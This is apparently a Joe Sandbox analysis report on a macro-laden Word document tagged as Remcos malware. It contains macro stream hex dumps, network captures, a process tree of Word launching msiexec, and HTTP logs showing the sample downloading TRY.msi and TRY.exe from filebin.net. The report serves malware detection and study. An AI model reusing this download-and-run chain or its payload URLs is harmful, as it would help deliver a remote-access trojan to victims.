Data Raw:	49 44 3d 22 7b 30 36 32 35 45 34 34 41 2d 45 37 36 35 2d 34 31 43 45 2d 39 44 46 44 2d 43 33 34 37 33 36 42 37 35 41 34 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.07738448508
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2435
Entropy:	3.97570851109
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	513
Entropy:	6.23760719085
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . u a \\ d . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . r . m . .
Data Raw:	01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 75 61 5c 64 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.08065186697
Base64 Encoded:	False
Data ASCII:	. . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j D . D . . . . . . . . . . . . . . . . . . . . . . . . . . . & v S h & v S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 2d 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 44 1c 44 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 26 76 53 68 26 76 53 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2022 09:28:14.619941950 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.619987011 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.620054960 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.624121904 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.624165058 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.726838112 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.726980925 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.752002954 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.752063036 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.752675056 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:14.802963972 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:14.974719048 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.018227100 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033107042 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033246994 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033349991 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.033432007 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.033473015 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.033498049 CEST	49742	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:15.033516884 CEST	443	49742	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:15.100023031 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.100061893 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.100554943 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.100579977 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.100584984 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.325975895 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.326191902 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.328358889 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.328375101 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.328638077 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.331063986 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.374196053 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.379554033 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425172091 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425203085 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425347090 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.425367117 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425393105 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425406933 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425445080 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425462961 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.425492048 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.425501108 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.426240921 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471081018 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471131086 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471194029 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471352100 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471365929 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471517086 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471553087 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471641064 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471649885 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.471658945 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.471983910 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.472014904 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.472057104 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.472064018 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.472070932 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.472204924 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518028975 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518079042 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518227100 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518259048 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518277884 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518469095 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518502951 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518552065 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518568993 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.518580914 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518584967 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518630028 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.518970966 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519004107 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519097090 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519117117 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519130945 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519169092 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519419909 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519452095 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519550085 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519567013 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519579887 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519879103 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519908905 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519963026 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.519983053 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.519999027 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520006895 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520035982 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520370007 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520402908 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520462990 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520477057 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520541906 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520548105 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.520826101 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.520859957 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.521094084 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.521107912 CEST	443	49744	87.238.33.8	192.168.2.5

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Dropped Files

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\54841c.rbs

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\931CA4E3-9003-4E2D-AC60-8F56ED9BC214

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1A0CB39D-07E3-4E62-8803-0A309F2608CA}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\thai.bat

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files.cab

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe (copy)

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\fd1981f4a71244758e929e11db0d4f1d$dpx$.tmp\bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\msiwrapper.ini

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au1v2jy0.qdl.ps1

Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2022 09:28:14.554792881 CEST	54322	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:14.605547905 CEST	53	54322	8.8.8.8	192.168.2.5
Apr 20, 2022 09:28:15.045897961 CEST	62704	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:15.097917080 CEST	53	62704	8.8.8.8	192.168.2.5
Apr 20, 2022 09:28:44.012177944 CEST	63187	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:44.028873920 CEST	53	63187	8.8.8.8	192.168.2.5
Apr 20, 2022 09:28:44.535057068 CEST	60658	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:44.588800907 CEST	53	60658	8.8.8.8	192.168.2.5

Timestamp	kBytes transferred	Direction	Data
2022-04-20 07:28:14 UTC	0	OUT	GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows Installer Host: filebin.net
2022-04-20 07:28:15 UTC	0	IN	HTTP/1.1 302 Found Cache-Control: max-age=0 Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072814Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=81a6b2d7f153c8ae19ac27531faf11add08f39212f5a9e9b8b8b46feec74e3da X-Robots-Tag: noindex Date: Wed, 20 Apr 2022 07:28:14 GMT Content-Length: 0 X-Varnish: 295248 Age: 0 Via: 1.1 varnish (Varnish/6.0) Access-Control-Allow-Origin: * Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-04-20 07:28:44 UTC	481	OUT	GET /rf43v6qzghbj7h7b/TRY.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: filebin.net Connection: Keep-Alive
2022-04-20 07:28:44 UTC	482	IN	HTTP/1.1 302 Found Cache-Control: max-age=0 Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/7ff329000ec5f0e56f28414ebbe22f0c0905296169e7398f417a543e662f9503?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072844Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.exe%22&response-content-type=application%2Fvnd.microsoft.portable-executable&X-Amz-Signature=c205dd25825136b9a5d453fd33964b1791fdc2217c3bde2a85904dc7ce3c2af9 X-Robots-Tag: noindex Date: Wed, 20 Apr 2022 07:28:44 GMT Content-Length: 0 X-Varnish: 393425 Age: 0 Via: 1.1 varnish (Varnish/6.0) Access-Control-Allow-Origin: * Connection: close

Target ID:	0
Start time:	09:28:06
Start date:	20/04/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xde0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	3
Start time:	09:28:12
Start date:	20/04/2022
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7b26c0000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	4
Start time:	09:28:16
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9
Imagebase:	0x50000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	7
Start time:	09:28:20
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Imagebase:	0xce0000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	9
Start time:	09:28:22
Start date:	20/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	10
Start time:	09:28:23
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Imagebase:	0xa60000
File size:	52736 bytes
MD5 hash:	8F8C20238C1194A428021AC62257436D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	11
Start time:	09:28:26
Start date:	20/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high